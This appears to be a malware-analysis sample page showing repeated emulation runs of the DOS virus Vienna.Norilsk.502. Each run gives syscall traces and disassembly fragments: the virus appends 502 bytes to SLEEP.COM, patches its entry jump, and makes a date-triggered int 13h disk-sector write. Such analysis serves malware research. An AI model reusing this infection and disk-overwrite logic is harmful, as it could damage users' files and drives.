Sample viewer

vx.netlux.org/Virus.DOS.Vienna.Norilsk.502

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:32:39.351793961Z 42 PC: 12c09 | Get date 0x12c09: cmp dh, 1
0x12c0c: jne 0x12c1e
0x12c0e: cmp dl, 0xe
0x12c11: jne 0x12c1e
0x12c13: mov ax, 0x702
0x12c16: mov cx, 0x300
0x12c19: mov dx, 0x80
0x12c1c: int 0x13
0x12c1e: ret
0x12c1f: cmp al, byte ptr [bx + si]
0x12c21: push cx
0x12c22: fadd dword ptr [bx + si]
0x12c26: or al, 0x20
0x12c28: add byte ptr [bx + 0x76], dl
0x12c2b: je 0x12c4b
0x12c2d: pop dx
0x12c2e: jns 0x12c92
0x12c30: js 0x12be7
0x12c33: add word ptr [bx + si + 0xae9], si
0x12c37: add byte ptr [bp + si], ch
2018-12-17T22:32:39.354802352Z 48 PC: 12a82 | Get DOS version
2018-12-17T22:32:39.35649802Z 47 PC: 12a8e | Get disk transfer address
2018-12-17T22:32:39.357875033Z 26 PC: 12a9b | Set disk transfer address
2018-12-17T22:32:39.359681298Z 78 PC: 12b0e | Find first file
2018-12-17T22:32:39.36712315Z 67 PC: 12b45 | Get or set file attributes
2018-12-17T22:32:39.373472766Z 67 PC: 12b53 | Get or set file attributes
2018-12-17T22:32:39.716767897Z 61 PC: 12b5e | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:32:39.724702987Z 87 PC: 12b6a | Get or set file date and time
2018-12-17T22:32:39.726812281Z 44 PC: 12b74 | Get time 0x12b74: mov ah, 0x3f
0x12b76: mov cx, 3
0x12b79: lea dx, word ptr [si + 0x13]
0x12b7c: int 0x21
0x12b7e: jb 0x12bc7
0x12b80: cmp ax, 3
0x12b83: jne 0x12bc7
0x12b85: mov ax, 0x4202
0x12b88: xor cx, cx
0x12b8a: xor dx, dx
0x12b8c: int 0x21
0x12b8e: jb 0x12bc7
0x12b90: mov cx, ax
0x12b92: sub ax, 3
0x12b95: mov word ptr [si + 0x17], ax
0x12b98: add cx, 0x2d2
0x12b9c: mov word ptr [si - 0x1d1], cx
0x12ba0: mov ah, 0x40
0x12ba2: mov cx, 0x1f6
0x12ba5: nop
2018-12-17T22:32:39.729676554Z 63 PC: 12b7e | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:32:39.73778179Z 66 PC: 12b8e | Move file pointer
2018-12-17T22:32:39.7394588Z 64 PC: 12bac | Write file or device (Write 502 bytes on handle 5)
2018-12-17T22:32:39.749116502Z 66 PC: 12bbb | Move file pointer
2018-12-17T22:32:39.751030588Z 64 PC: 12bc7 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:32:39.758077768Z 87 PC: 12bd8 | Get or set file date and time
2018-12-17T22:32:39.75965638Z 62 PC: 12bdc | Close file
2018-12-17T22:32:39.766302499Z 67 PC: 12be7 | Get or set file attributes
2018-12-17T22:32:39.774059165Z 26 PC: 12bf2 | Set disk transfer address
2018-12-17T22:32:39.775924652Z 76 PC: 12a4d | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5835,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:31.612261126Z 42 PC: 12c09 | Get date 0x12c09: cmp dh, 1
0x12c0c: jne 0x12c1e
0x12c0e: cmp dl, 0xe
0x12c11: jne 0x12c1e
0x12c13: mov ax, 0x702
0x12c16: mov cx, 0x300
0x12c19: mov dx, 0x80
0x12c1c: int 0x13
0x12c1e: ret
0x12c1f: cmp al, byte ptr [bx + si]
0x12c21: push cx
0x12c22: fadd dword ptr [bx + si]
0x12c26: or al, 0x20
0x12c28: add byte ptr [bx + 0x76], dl
0x12c2b: je 0x12c4b
0x12c2d: pop dx
0x12c2e: jns 0x12c92
0x12c30: js 0x12be7
0x12c33: add word ptr [bx + si + 0xae9], si
0x12c37: add byte ptr [bp + si], ch
2018-12-25T11:55:31.61415439Z 48 PC: 12a82 | Get DOS version
2018-12-25T11:55:31.615074034Z 47 PC: 12a8e | Get disk transfer address
2018-12-25T11:55:31.616010761Z 26 PC: 12a9b | Set disk transfer address
2018-12-25T11:55:31.617844783Z 78 PC: 12b0e | Find first file
2018-12-25T11:55:31.623713065Z 67 PC: 12b45 | Get or set file attributes
2018-12-25T11:55:31.62915011Z 67 PC: 12b53 | Get or set file attributes
2018-12-25T11:55:31.653748012Z 61 PC: 12b5e | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:31.666063613Z 87 PC: 12b6a | Get or set file date and time
2018-12-25T11:55:31.667374844Z 44 PC: 12b74 | Get time 0x12b74: mov ah, 0x3f
0x12b76: mov cx, 3
0x12b79: lea dx, word ptr [si + 0x13]
0x12b7c: int 0x21
0x12b7e: jb 0x12bc7
0x12b80: cmp ax, 3
0x12b83: jne 0x12bc7
0x12b85: mov ax, 0x4202
0x12b88: xor cx, cx
0x12b8a: xor dx, dx
0x12b8c: int 0x21
0x12b8e: jb 0x12bc7
0x12b90: mov cx, ax
0x12b92: sub ax, 3
0x12b95: mov word ptr [si + 0x17], ax
0x12b98: add cx, 0x2d2
0x12b9c: mov word ptr [si - 0x1d1], cx
0x12ba0: mov ah, 0x40
0x12ba2: mov cx, 0x1f6
0x12ba5: nop
2018-12-25T11:55:31.669801517Z 63 PC: 12b7e | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:55:31.676770029Z 66 PC: 12b8e | Move file pointer
2018-12-25T11:55:31.679072354Z 64 PC: 12bac | Write file or device (Write 502 bytes on handle 5)
2018-12-25T11:55:31.688288118Z 66 PC: 12bbb | Move file pointer
2018-12-25T11:55:31.689545367Z 64 PC: 12bc7 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:55:31.694693919Z 87 PC: 12bd8 | Get or set file date and time
2018-12-25T11:55:31.696352663Z 62 PC: 12bdc | Close file
2018-12-25T11:55:31.703778789Z 67 PC: 12be7 | Get or set file attributes
2018-12-25T11:55:31.716358777Z 26 PC: 12bf2 | Set disk transfer address
2018-12-25T11:55:31.718641821Z 76 PC: 12a4d | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":14,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5835,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:31.732532306Z 42 PC: 12c09 | Get date 0x12c09: cmp dh, 1
0x12c0c: jne 0x12c1e
0x12c0e: cmp dl, 0xe
0x12c11: jne 0x12c1e
0x12c13: mov ax, 0x702
0x12c16: mov cx, 0x300
0x12c19: mov dx, 0x80
0x12c1c: int 0x13
0x12c1e: ret
0x12c1f: cmp al, byte ptr [bx + si]
0x12c21: push cx
0x12c22: fadd dword ptr [bx + si]
0x12c26: or al, 0x20
0x12c28: add byte ptr [bx + 0x76], dl
0x12c2b: je 0x12c4b
0x12c2d: pop dx
0x12c2e: jns 0x12c92
0x12c30: js 0x12be7
0x12c33: add word ptr [bx + si + 0xae9], si
0x12c37: add byte ptr [bp + si], ch
2018-12-25T11:55:31.735353966Z 48 PC: 12a82 | Get DOS version
2018-12-25T11:55:31.736460242Z 47 PC: 12a8e | Get disk transfer address
2018-12-25T11:55:31.737621142Z 26 PC: 12a9b | Set disk transfer address
2018-12-25T11:55:31.739760678Z 78 PC: 12b0e | Find first file
2018-12-25T11:55:31.745689365Z 67 PC: 12b45 | Get or set file attributes
2018-12-25T11:55:31.751929479Z 67 PC: 12b53 | Get or set file attributes
2018-12-25T11:55:31.766910911Z 61 PC: 12b5e | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:31.773635827Z 87 PC: 12b6a | Get or set file date and time
2018-12-25T11:55:31.775180128Z 44 PC: 12b74 | Get time 0x12b74: mov ah, 0x3f
0x12b76: mov cx, 3
0x12b79: lea dx, word ptr [si + 0x13]
0x12b7c: int 0x21
0x12b7e: jb 0x12bc7
0x12b80: cmp ax, 3
0x12b83: jne 0x12bc7
0x12b85: mov ax, 0x4202
0x12b88: xor cx, cx
0x12b8a: xor dx, dx
0x12b8c: int 0x21
0x12b8e: jb 0x12bc7
0x12b90: mov cx, ax
0x12b92: sub ax, 3
0x12b95: mov word ptr [si + 0x17], ax
0x12b98: add cx, 0x2d2
0x12b9c: mov word ptr [si - 0x1d1], cx
0x12ba0: mov ah, 0x40
0x12ba2: mov cx, 0x1f6
0x12ba5: nop
2018-12-25T11:55:31.777056334Z 63 PC: 12b7e | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:55:31.783407625Z 66 PC: 12b8e | Move file pointer
2018-12-25T11:55:31.784604264Z 64 PC: 12bac | Write file or device (Write 502 bytes on handle 5)
2018-12-25T11:55:31.792037025Z 66 PC: 12bbb | Move file pointer
2018-12-25T11:55:31.793759595Z 64 PC: 12bc7 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:55:31.799896753Z 87 PC: 12bd8 | Get or set file date and time
2018-12-25T11:55:31.801455738Z 62 PC: 12bdc | Close file
2018-12-25T11:55:31.810392439Z 67 PC: 12be7 | Get or set file attributes
2018-12-25T11:55:31.820616314Z 26 PC: 12bf2 | Set disk transfer address
2018-12-25T11:55:31.821888073Z 76 PC: 12a4d | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":2,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5835,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:31.890520527Z 42 PC: 12c09 | Get date 0x12c09: cmp dh, 1
0x12c0c: jne 0x12c1e
0x12c0e: cmp dl, 0xe
0x12c11: jne 0x12c1e
0x12c13: mov ax, 0x702
0x12c16: mov cx, 0x300
0x12c19: mov dx, 0x80
0x12c1c: int 0x13
0x12c1e: ret
0x12c1f: cmp al, byte ptr [bx + si]
0x12c21: push cx
0x12c22: fadd dword ptr [bx + si]
0x12c26: or al, 0x20
0x12c28: add byte ptr [bx + 0x76], dl
0x12c2b: je 0x12c4b
0x12c2d: pop dx
0x12c2e: jns 0x12c92
0x12c30: js 0x12be7
0x12c33: add word ptr [bx + si + 0xae9], si
0x12c37: add byte ptr [bp + si], ch
2018-12-25T11:55:31.893680353Z 48 PC: 12a82 | Get DOS version
2018-12-25T11:55:31.8954849Z 47 PC: 12a8e | Get disk transfer address
2018-12-25T11:55:31.896830753Z 26 PC: 12a9b | Set disk transfer address
2018-12-25T11:55:31.898295567Z 78 PC: 12b0e | Find first file
2018-12-25T11:55:31.90720801Z 67 PC: 12b45 | Get or set file attributes
2018-12-25T11:55:31.913666468Z 67 PC: 12b53 | Get or set file attributes
2018-12-25T11:55:31.940634612Z 61 PC: 12b5e | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:31.948914786Z 87 PC: 12b6a | Get or set file date and time
2018-12-25T11:55:31.951443163Z 44 PC: 12b74 | Get time 0x12b74: mov ah, 0x3f
0x12b76: mov cx, 3
0x12b79: lea dx, word ptr [si + 0x13]
0x12b7c: int 0x21
0x12b7e: jb 0x12bc7
0x12b80: cmp ax, 3
0x12b83: jne 0x12bc7
0x12b85: mov ax, 0x4202
0x12b88: xor cx, cx
0x12b8a: xor dx, dx
0x12b8c: int 0x21
0x12b8e: jb 0x12bc7
0x12b90: mov cx, ax
0x12b92: sub ax, 3
0x12b95: mov word ptr [si + 0x17], ax
0x12b98: add cx, 0x2d2
0x12b9c: mov word ptr [si - 0x1d1], cx
0x12ba0: mov ah, 0x40
0x12ba2: mov cx, 0x1f6
0x12ba5: nop
2018-12-25T11:55:31.954198322Z 63 PC: 12b7e | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:55:31.962828013Z 66 PC: 12b8e | Move file pointer
2018-12-25T11:55:31.964488195Z 64 PC: 12bac | Write file or device (Write 502 bytes on handle 5)
2018-12-25T11:55:31.9739656Z 66 PC: 12bbb | Move file pointer
2018-12-25T11:55:31.982057258Z 64 PC: 12bc7 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:55:31.989939518Z 87 PC: 12bd8 | Get or set file date and time
2018-12-25T11:55:31.992091371Z 62 PC: 12bdc | Close file
2018-12-25T11:55:32.001251533Z 67 PC: 12be7 | Get or set file attributes
2018-12-25T11:55:32.012957653Z 26 PC: 12bf2 | Set disk transfer address
2018-12-25T11:55:32.025160838Z 76 PC: 12a4d | Terminate with return code (Return code = '0')